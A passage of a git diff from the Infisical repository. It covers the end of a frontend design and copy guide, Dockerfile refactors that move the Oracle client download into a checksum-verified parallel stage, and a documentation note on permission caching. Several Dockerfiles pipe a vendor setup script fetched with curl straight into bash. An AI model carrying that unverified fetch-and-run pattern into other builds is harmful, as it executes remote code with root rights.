[`Separator`](frontend/src/components/v3/generic/Separator/Separator.tsx) | Horizontal/vertical divider. | +| [`ScopeIcons`](frontend/src/components/v3/platform/ScopeIcons.tsx) | `OrgIcon` / `SubOrgIcon` / `ProjectIcon` / `InstanceIcon` β€” use when intent is scope. | +| [`DocumentationLinkBadge`](frontend/src/components/v3/platform/DocumentationLinkBadge/DocumentationLinkBadge.tsx) | Inline "Documentation" link badge in `CardTitle`. | + +**Icons** β€” [`lucide-react`](https://lucide.dev). Sizing is bound by the +host component; don't override unless necessary. + +## 5. Layout Principles + +- **Page container** β€” `max-w-8xl` (88rem) centered, `bg-bunker-800`. +- **Page header** β€” `PageHeader` with scope icon + underlined `h1` + description. See [`PageHeader.tsx`](frontend/src/components/v2/PageHeader/PageHeader.tsx). Always set `scope` to the correct hierarchy level. +- **Section** β€” one `Card` per logical section. Title + optional `DocumentationLinkBadge` in `CardHeader`; primary action in `CardAction` (top-right). +- **Tables inside Cards** β€” filters and search sit in the `CardHeader` above the table; pagination sits in the `CardFooter` or bottom of `CardContent`. +- **Forms inside Sheets/Dialog** β€” create / edit flows open in a right-side Sheet or Dialog, never inline, never as a full-page route. Multi-step forms remain inside the Sheet. +- **Spacing rhythm** β€” `gap-1.5` (intra-element), `gap-2 / gap-3` (adjacent elements), `p-4 / p-5` (section padding). Card = `p-5 gap-5`; Sheet header/footer = `p-4`. + +## 6. Depth & Elevation + +Depth is conveyed by layered surface tones and borders. Shadows are reserved +for elements that float (Popover, DropdownMenu, Sheet). + +| Layer | Surface | Border | +| ------------------- | ------------------ | ------------- | +| Page | `bg-bunker-800` | β€” | +| Card | `bg-card` | `border-border` | +| Popover / Sheet | `bg-popover` | `border-border` + `shadow-lg` | +| Row hover | `bg-container-hover` | β€” | +| Focus | β€” | 3px ring, `--color-ring` | +| Disabled | `opacity-50 / 75`, `pointer-events-none` | β€” | + +Never add a box-shadow to a Card, Table row, or Badge; it breaks the +border-defined system. + +## 7. Do's and Don'ts + +- **DO** choose Badge and Button variants by **intent** (danger / success / + warning / info / neutral), not by color preference. +- **DO** use scope colors (`org`, `sub-org`, `project`, `admin`) to reinforce + hierarchy β€” the scope of a page, a primary button, a scope-link badge. +- **DO** mask secret values by default. Reveal must be an explicit user + action and should be logged. +- **DO** put large create / edit forms in a right-side Sheet; smaller forms can be in Dialogs. +- **DO** pair destructive confirmations with the resource name and the + consequence (see Β§9). +- **DO** cite tokens (`bg-card`) over hex (`#xxxxxx`) in new code. +- **DON'T** use v2 components when a v3 equivalent exists unless the existing scope is v2. +- **DON'T** add box-shadows as a depth cue β€” borders and surface tones do + that work. The exception is elements that genuinely float (Popover, + DropdownMenu, Sheet), which already include it. +- **DON'T** invent new colors. If it isn't in `index.css` `@theme`, it + doesn't belong. +- **DON'T** use `project` yellow, `org` blue, or `sub-org` green as generic + accents. They are scope signals; repurposing them creates false hierarchy. +- **DON'T** mix font families. Inter only. +- **DON'T** animate for decoration. Motion should clarify state change only. + +## 8. Voice & Content Tone + +Copy should read as if written by an engineer for another engineer: direct, +technical, specific. The domain is serious β€” secrets, access, compliance β€” +and the voice reflects that. + +### Stance + +- Direct. Active voice. Lead with the subject: "Delete this role" β€” not + "This role will be deleted". +- Specific. Name the resource, the action, the consequence. Avoid vague + verbs ("handle", "manage") when a precise verb exists (`rotate`, `revoke`, + `import`). +- Calm. No exclamation marks. No second-person cheer ("Awesome!", + "You're all set!"). No emoji. +- Honest. Never claim speed, power, or ease in UI copy ("seamless", + "powerful", "blazing-fast"). Those belong on the marketing site, not here. + +### Shapes + +- **Labels & buttons** β€” Title Case, imperative: "Add Secret", "Revoke + Access", "Rotate Key". +- **Descriptions & helper text** β€” sentence case, one short sentence. +- **Empty states** β€” state what's missing, then the next action: + "No secrets yet. Add your first secret to get started." +- **Errors** β€” name the failure and the remedy. Never "Something went wrong": + "Could not rotate secret β€” token lacks `secrets:write` permission." +- **Destructive confirmation** β€” name the resource and the consequence "Delete "API_KEY" β€” this cannot be undone." +- **Success toasts** β€” past tense, specific: "Secret "API_KEY" created". + +### Secrets & sensitive values + +Never include a secret's value in any user-visible copy β€” UI, logs, toasts, +errors, audit trails, or analytics. Refer to secrets by key only. Mask +tokens and keys in screenshots and docs as well. + +### Documentation links + +Use `DocumentationLinkBadge` (info variant, external-link icon). Label it +"Documentation" β€” not "Learn more", "Read docs", "See more". + +## 9. Agent Prompt Guide + +Pasteable prompt fragments for AI coding agents producing new UI. + +**Before generating UI for any component:** + +1. Open `frontend/src/components/v3/generic//.stories.tsx`. +2. Pick the `Example:` story closest to your need; mirror its composition exactly. +3. Pick the variant by reading the matching `Variant:` story's description β€” + not by color preference. + +**Adding a section to an existing page:** +> Wrap the section in a `Card` from `@app/components/v3`. Use `CardHeader` +> with `CardTitle` + optional `CardDescription` + `CardAction` for the +> top-right primary button (variant `project` on a project page). Put the +> table or content in `CardContent`. + +**A new create/edit form:** +> Put the form in a right-side `Sheet` (`Sheet`, `SheetContent`, +> `SheetHeader` with `SheetTitle` + `SheetDescription`, `SheetFooter` with +> the action buttons). Use `react-hook-form` with a Zod resolver. Each input +> is wrapped in `Field` + `FieldLabel` + `FieldContent` + `FieldError`. Primary button is +> variant is scope dependent `project`, secondary is `outline`, cancel is `ghost`. + +**A status indicator:** +> Use `Badge` from `@app/components/v3`. Pick the variant by intent: +> `danger` for errors or expired access, `warning` for stale or +> attention-warranting, `success` for healthy / completed, `info` for +> informational, `neutral` for disabled / empty, `project` / `org` / +> `sub-org` for scope references. Include a matching Lucide icon as the +> first child. + +**A destructive confirmation:** +> Use `AlertDialog`. Title: "Delete ``". Description: one +> sentence naming the consequence, ending with "This cannot be undone." +> Confirm button is variant `danger`. Cancel button is variant `outline`. + +**A documentation link in a section:** +> Use `DocumentationLinkBadge` from `@app/components/v3/platform`. Place it +> in the `CardTitle` next to the section name. + +**Refer to:** + +- [`Badge.stories.tsx`](frontend/src/components/v3/generic/Badge/Badge.stories.tsx) β€” canonical semantic reference for variant choice. +- [`OverviewPage`](frontend/src/pages/secret-manager/OverviewPage) β€” full-page reference (PageHeader, Card-with-table, Create Secret Sheet, filters, DropdownMenu + ButtonGroup). +- [`AccessControlPage`](frontend/src/pages/project/AccessControlPage) β€” full-page reference (permission-gated actions, `DocumentationLinkBadge`, role badges with `ClockAlertIcon` for expired access). +- Β§8 above for any user-visible copy. + +## Appendix: Iteration Guide + +1. **Run Storybook** β€” `cd frontend && npm run storybook` (port 6006). Open + Badge, Button, Card, Table, Sheet first. +2. **Read the two reference pages** β€” `OverviewPage` and `AccessControlPage` + render the full v3 vocabulary in production. +3. **Tokens live in `index.css`** β€” `@theme` block, lines 56–214. Never + introduce a hex that is not here. +4. **Adding a variant** β€” extend the `cva()` block in the component and add + a story. Keep the tint pattern (`bg-/15 border-/10` for Badge, + `bg-/10 border-/25` for Button). +5. **Never use v2 for new code** β€” unless no v3 equivalent exists. + `PageHeader` is the notable v2 exception still used by all pages. +6. **Before merging** β€” `make reviewable-ui` (lint + type-check). +7. **When in doubt** β€” mirror `OverviewPage`. diff --git a/Dockerfile.fips.standalone-infisical b/Dockerfile.fips.standalone-infisical index 1d617355b5f..cbdc8ad72b6 100644 --- a/Dockerfile.fips.standalone-infisical +++ b/Dockerfile.fips.standalone-infisical @@ -55,6 +55,27 @@ USER non-root-user ## ## BACKEND ## + +# Oracle Instant Client (parallel stage β€” downloads while other stages build) +FROM debian:trixie-slim AS oracle +RUN apt-get update && apt-get install -y unzip wget ca-certificates \ + && rm -rf /var/lib/apt/lists/* + +RUN ARCH=$(dpkg --print-architecture) && \ + if [ "$ARCH" = "amd64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5"; \ + elif [ "$ARCH" = "arm64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32"; \ + fi && \ + ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ + wget -q "$ORACLE_URL" && \ + echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ + mkdir -p /opt/oracle && \ + unzip "$ORACLE_ZIP" -d /opt/oracle && \ + rm "$ORACLE_ZIP" + FROM base AS backend-build ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/ @@ -117,7 +138,7 @@ RUN mkdir frontend-build # Production stage FROM base AS production -# Install necessary packages including ODBC +# Install all required runtime packages RUN apt-get update && apt-get install -y \ build-essential \ autoconf \ @@ -137,40 +158,27 @@ RUN apt-get update && apt-get install -y \ freetds-dev \ freetds-bin \ tdsodbc \ + libaio1t64 \ + smbclient \ openssh-client \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.47 \ && rm -rf /var/lib/apt/lists/* -# Install Oracle Instant Client for OracleDB mTLS wallet support +# Copy Oracle Instant Client from parallel stage +COPY --from=oracle /opt/oracle /opt/oracle RUN ARCH=$(dpkg --print-architecture) && \ if [ "$ARCH" = "amd64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5" && \ - apt-get update && apt-get install -y libaio1t64 unzip && \ - ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ elif [ "$ARCH" = "arm64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32" && \ - apt-get update && apt-get install -y libaio1t64 unzip && \ - ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ fi && \ echo /opt/oracle/instantclient_23_26 > /etc/ld.so.conf.d/oracle-instantclient.conf && \ - ldconfig && \ - rm -rf /var/lib/apt/lists/* + ldconfig # Configure ODBC in production RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini - WORKDIR /openssl-build RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \ && tar -xf openssl-3.1.2.tar.gz \ @@ -183,9 +191,6 @@ RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \ && apt-get clean \ && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient && rm -rf /var/lib/apt/lists/* - # Build OpenSSL 3.5.6 for PQC (ML-DSA / SLH-DSA) certificate support. # Installed to /opt/openssl-pqc so it does not conflict with the FIPS OpenSSL above. WORKDIR /tmp/openssl-pqc-build @@ -199,11 +204,6 @@ RUN wget -q https://github.com/openssl/openssl/releases/download/openssl-3.5.6/o && cd / \ && rm -rf /tmp/openssl-pqc-build -# Install Infisical CLI -RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ - && apt-get update && apt-get install -y infisical=0.43.47 \ - && rm -rf /var/lib/apt/lists/* - RUN groupadd -r -g 1001 nodejs && useradd -r -u 1001 -g nodejs non-root-user # Give non-root-user permission to update SSL certs diff --git a/Dockerfile.standalone-infisical b/Dockerfile.standalone-infisical index 443bd5c26b1..3532b7dae91 100644 --- a/Dockerfile.standalone-infisical +++ b/Dockerfile.standalone-infisical @@ -57,6 +57,27 @@ USER non-root-user ## ## BACKEND ## + +# Oracle Instant Client (parallel stage β€” downloads while other stages build) +FROM debian:trixie-slim AS oracle +RUN apt-get update && apt-get install -y unzip wget ca-certificates \ + && rm -rf /var/lib/apt/lists/* + +RUN ARCH=$(dpkg --print-architecture) && \ + if [ "$ARCH" = "amd64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5"; \ + elif [ "$ARCH" = "arm64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32"; \ + fi && \ + ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ + wget -q "$ORACLE_URL" && \ + echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ + mkdir -p /opt/oracle && \ + unzip "$ORACLE_ZIP" -d /opt/oracle && \ + rm "$ORACLE_ZIP" + FROM base AS backend-build ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/ @@ -87,14 +108,12 @@ RUN npm i -g tsconfig-paths ENV NODE_OPTIONS="--max-old-space-size=8192" RUN npm run build -# Production stage -FROM base AS backend-runner - -ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/ +# Production dependencies (runs in parallel with backend-build) +FROM base AS backend-prod-deps WORKDIR /app -# Install all required dependencies for runtime +# Install build tools needed to compile native modules during npm ci RUN apt-get update && apt-get install -y \ python3 \ make \ @@ -106,70 +125,63 @@ RUN apt-get update && apt-get install -y \ freetds-dev \ && rm -rf /var/lib/apt/lists/* +COPY backend/package*.json ./ +RUN npm ci --omit=dev + +# Production stage +FROM base AS backend-runner + +ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/ + +WORKDIR /app + +# Only runtime libraries needed β€” no compilation happens here +RUN apt-get update && apt-get install -y \ + unixodbc \ + freetds-bin \ + && rm -rf /var/lib/apt/lists/* + # Configure ODBC RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini COPY --from=backend-build /app . RUN rm -rf ./node_modules ./bdd ./e2e-test -RUN npm ci --omit=dev +COPY --from=backend-prod-deps /app/node_modules ./node_modules RUN mkdir frontend-build # Production stage FROM base AS production +# Runtime dependencies + build tools needed for PQC OpenSSL build RUN apt-get update && apt-get install -y \ - build-essential \ - autoconf \ - automake \ - libtool \ - libssl-dev \ ca-certificates \ bash \ curl \ git \ - python3 \ - make \ - g++ \ unixodbc \ freetds-bin \ - unixodbc-dev \ - libc-dev \ - freetds-dev \ wget \ perl \ + build-essential \ + libssl-dev \ openssh-client \ + libaio1t64 \ + smbclient \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.47 \ && rm -rf /var/lib/apt/lists/* -# Install Oracle Instant Client for OracleDB mTLS wallet support +# Copy Oracle Instant Client from parallel stage +COPY --from=oracle /opt/oracle /opt/oracle RUN ARCH=$(dpkg --print-architecture) && \ if [ "$ARCH" = "amd64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5" && \ - apt-get update && apt-get install -y libaio1t64 unzip && \ - ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ elif [ "$ARCH" = "arm64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32" && \ - apt-get update && apt-get install -y libaio1t64 unzip && \ - ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ fi && \ echo /opt/oracle/instantclient_23_26 > /etc/ld.so.conf.d/oracle-instantclient.conf && \ - ldconfig && \ - rm -rf /var/lib/apt/lists/* - -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient && rm -rf /var/lib/apt/lists/* + ldconfig # Build OpenSSL 3.5.6 for PQC (ML-DSA / SLH-DSA) certificate support. # Installed to /opt/openssl-pqc so it does not conflict with the system OpenSSL. @@ -184,11 +196,6 @@ RUN wget -q https://github.com/openssl/openssl/releases/download/openssl-3.5.6/o && cd / \ && rm -rf /tmp/openssl-build -# Install Infisical CLI -RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ - && apt-get update && apt-get install -y infisical=0.43.47 \ - && rm -rf /var/lib/apt/lists/* - WORKDIR / # Configure ODBC in production @@ -199,12 +206,10 @@ RUN groupadd --system --gid 1001 nodejs \ && useradd --system --uid 1001 --gid nodejs non-root-user # Give non-root-user permission to update SSL certs -RUN chown -R non-root-user /etc/ssl/certs -RUN chown non-root-user /etc/ssl/certs/ca-certificates.crt -RUN chmod -R u+rwx /etc/ssl/certs -RUN chmod u+rw /etc/ssl/certs/ca-certificates.crt -RUN chown non-root-user /usr/sbin/update-ca-certificates -RUN chmod u+rx /usr/sbin/update-ca-certificates +RUN chown -R non-root-user /etc/ssl/certs \ + && chmod -R u+rwx /etc/ssl/certs \ + && chown non-root-user /usr/sbin/update-ca-certificates \ + && chmod u+rx /usr/sbin/update-ca-certificates ## set pre baked keys ARG POSTHOG_API_KEY @@ -229,6 +234,21 @@ ENV DD_GIT_REPOSITORY_URL $DD_GIT_REPOSITORY_URL ARG DD_GIT_COMMIT_SHA ENV DD_GIT_COMMIT_SHA $DD_GIT_COMMIT_SHA +# OCI Image Labels - Static metadata +# See: https://github.com/opencontainers/image-spec/blob/main/annotations.md +LABEL org.opencontainers.image.title="Infisical" +LABEL org.opencontainers.image.description="Open-source secret management platform" +LABEL org.opencontainers.image.url="https://infisical.com" +LABEL org.opencontainers.image.documentation="https://infisical.com/docs" +LABEL org.opencontainers.image.source="https://github.com/Infisical/infisical" +LABEL org.opencontainers.image.vendor="Infisical" +LABEL org.opencontainers.image.licenses="MIT" +LABEL org.opencontainers.image.base.name="node:22.22.0-trixie-slim" + +# OCI Image Labels - Dynamic metadata (set via build args) +LABEL org.opencontainers.image.version="${INFISICAL_PLATFORM_VERSION}" +LABEL org.opencontainers.image.revision="${DD_GIT_COMMIT_SHA}" + ENV PORT 8080 ENV HOST=0.0.0.0 ENV HTTPS_ENABLED false diff --git a/backend/.gitignore b/backend/.gitignore index 00425e090d9..dbb2683fb46 100644 --- a/backend/.gitignore +++ b/backend/.gitignore @@ -1,3 +1,4 @@ dist +.cache /wallet diff --git a/backend/CLAUDE.md b/backend/CLAUDE.md index a38752b0214..e525ad3114d 100644 --- a/backend/CLAUDE.md +++ b/backend/CLAUDE.md @@ -88,7 +88,7 @@ Services live in `src/services/` (100+ modules). Each typically contains: Routes use Fastify's Zod type provider β€” schemas auto-generate OpenAPI docs. Each route specifies: `method`, `url`, `config.rateLimit` (using `readLimit` or `writeLimit` presets), `schema` (Zod schemas with `operationId` for OpenAPI), `onRequest: verifyAuth([AuthMode.*])`, and a `handler` that accesses business logic via `server.services.*`. -See `src/server/routes/v3/user-router.ts` for a representative router file. +See `src/server/routes/v4/secret-router.ts` for a representative router file. ### Auth System @@ -124,6 +124,15 @@ Uses CASL (`@casl/ability`) with MongoDB-style rules. Permission logic lives in Built-in roles: `Admin`, `Member`, `Viewer`, `NoAccess`. Custom roles use unpacked CASL rules stored in the database. Rules can include conditions with operators `$IN`, `$EQ`, `$NEQ`, `$GLOB` (for pattern matching like `prod-*`). See `PermissionConditionSchema` in `permission-types.ts`. +**Project permission caching** uses a fingerprint-based two-tier cache (`withCacheFingerprint` in `src/lib/cache/with-cache.ts`): +- **Short-lived marker** (10s TTL) in Redis β€” while present, cached data is served with 0 DB reads. +- **Long-lived data payload** (10m TTL) in Redis β€” holds the full permission blob plus a fingerprint hash. +- On marker expiry, a lightweight **fingerprint query** (`getPermissionFingerprint` in `permission-dal.ts`) runs (1 DB read). If the fingerprint matches the cached payload, the marker is reset; otherwise, a full data re-fetch occurs. +- The fingerprint covers **both project-scoped and org-scoped** memberships for the actor, so org-level changes (e.g. SSO bypass grant/revoke, org role edits) also trigger cache invalidation. +- `filterTemporary` in `flattenActiveRolesFromMemberships` runs on every request as a real-time safety net β€” it filters out expired temporary access regardless of cache state, so access revocation for timed roles/privileges is immediate. +- **No explicit cache invalidation calls exist.** The fingerprint self-corrects within the marker TTL (10s eventual consistency for access granting). The old `invalidateProjectPermissionCache` / DAL version counter pattern has been removed. +- Cache helpers (`cacheGet`, `cacheSet`, `applyReviver`) in `src/lib/cache/with-cache.ts` are shared between the simple `withCache` and the fingerprint-based `withCacheFingerprint`. + ### Request-Scoped Memoization A per-request in-memory cache that eliminates redundant DB reads within a single HTTP request. Defined in `src/lib/request-context/request-memoizer.ts`, attached to Fastify's `@fastify/request-context` as the `memoizer` field (initialized in `src/server/app.ts`). Cache is automatically garbage-collected when the request ends β€” zero staleness risk, zero infrastructure. diff --git a/backend/Dockerfile b/backend/Dockerfile index ad555bb8d68..4feea997d8c 100644 --- a/backend/Dockerfile +++ b/backend/Dockerfile @@ -3,90 +3,101 @@ FROM node:22.22.0-trixie-slim AS build WORKDIR /app -# Required for pkcs11js +# Required for pkcs11js and TDS driver (SAP ASE dynamic secrets) RUN apt-get update && apt-get install -y \ python3 \ make \ g++ \ openssh-client \ - openssl - -# Install dependencies for TDS driver (required for SAP ASE dynamic secrets) -RUN apt-get install -y \ + openssl \ unixodbc \ freetds-bin \ freetds-dev \ unixodbc-dev \ - libc-dev + libc-dev \ + && rm -rf /var/lib/apt/lists/* COPY package*.json ./ -RUN npm ci --only-production +RUN npm ci COPY . . RUN npm run build -# Production stage -FROM node:22.22.0-trixie-slim -WORKDIR /app +# Oracle Instant Client (parallel stage β€” downloads while other stages build) +FROM debian:trixie-slim AS oracle +RUN apt-get update && apt-get install -y unzip wget ca-certificates \ + && rm -rf /var/lib/apt/lists/* -ENV npm_config_cache /home/node/.npm +RUN ARCH=$(dpkg --print-architecture) && \ + if [ "$ARCH" = "amd64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5"; \ + elif [ "$ARCH" = "arm64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32"; \ + fi && \ + ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ + wget -q "$ORACLE_URL" && \ + echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ + mkdir -p /opt/oracle && \ + unzip "$ORACLE_ZIP" -d /opt/oracle && \ + rm "$ORACLE_ZIP" -COPY package*.json ./ +# Production dependencies (runs in parallel with build) +FROM node:22.22.0-trixie-slim AS prod-deps + +WORKDIR /app +# Build tools needed to compile native modules during npm ci RUN apt-get update && apt-get install -y \ python3 \ make \ - g++ - -# Install dependencies for TDS driver (required for SAP ASE dynamic secrets) -RUN apt-get install -y \ + g++ \ unixodbc \ freetds-bin \ freetds-dev \ unixodbc-dev \ - libc-dev + libc-dev \ + && rm -rf /var/lib/apt/lists/* + +COPY package*.json ./ +RUN npm ci --omit=dev + +# Production stage +FROM node:22.22.0-trixie-slim +WORKDIR /app + +ENV npm_config_cache /home/node/.npm + +# Only runtime dependencies β€” no compilation happens here +RUN apt-get update && apt-get install -y \ + unixodbc \ + freetds-bin \ + libaio1t64 \ + smbclient \ + curl \ + bash \ + git \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.14 \ + && rm -rf /var/lib/apt/lists/* RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini -# Install Oracle Instant Client for OracleDB mTLS wallet support +# Copy Oracle Instant Client from parallel stage +COPY --from=oracle /opt/oracle /opt/oracle RUN ARCH=$(dpkg --print-architecture) && \ if [ "$ARCH" = "amd64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5" && \ - apt-get update && apt-get install -y libaio1t64 unzip wget && \ - ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ elif [ "$ARCH" = "arm64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32" && \ - apt-get update && apt-get install -y libaio1t64 unzip wget && \ - ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ fi && \ echo /opt/oracle/instantclient_23_26 > /etc/ld.so.conf.d/oracle-instantclient.conf && \ - ldconfig && \ - rm -rf /var/lib/apt/lists/* - -RUN npm ci --only-production && npm cache clean --force + ldconfig COPY --from=build /app . -RUN rm -rf ./bdd ./e2e-test - -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient - -# Install Infisical CLI -RUN apt-get update && apt-get install -y curl bash && \ - curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \ - apt-get update && apt-get install -y infisical=0.43.14 git +RUN rm -rf ./node_modules ./bdd ./e2e-test +COPY --from=prod-deps /app/node_modules ./node_modules HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \ CMD node healthcheck.js diff --git a/backend/Dockerfile.dev b/backend/Dockerfile.dev index a072ce5a9f8..67c1e762a6f 100644 --- a/backend/Dockerfile.dev +++ b/backend/Dockerfile.dev @@ -7,7 +7,7 @@ ARG SOFTHSM2_VERSION=2.5.0 ENV SOFTHSM2_VERSION=${SOFTHSM2_VERSION} \ SOFTHSM2_SOURCES=/tmp/softhsm2 -# Install build dependencies including python3 (required for pkcs11js and partially TDS driver) +# Install all build and runtime dependencies RUN apt-get update && apt-get install -y \ build-essential \ autoconf \ @@ -24,26 +24,27 @@ RUN apt-get update && apt-get install -y \ wget \ perl \ pkg-config \ - unzip - -# Install libaio (required for Oracle Instant Client) - architecture-specific for Debian Trixie + unzip \ + libaio1t64 \ + unixodbc \ + unixodbc-dev \ + freetds-dev \ + freetds-bin \ + tdsodbc \ + opensc \ + smbclient \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.14 \ + && rm -rf /var/lib/apt/lists/* + +# Create 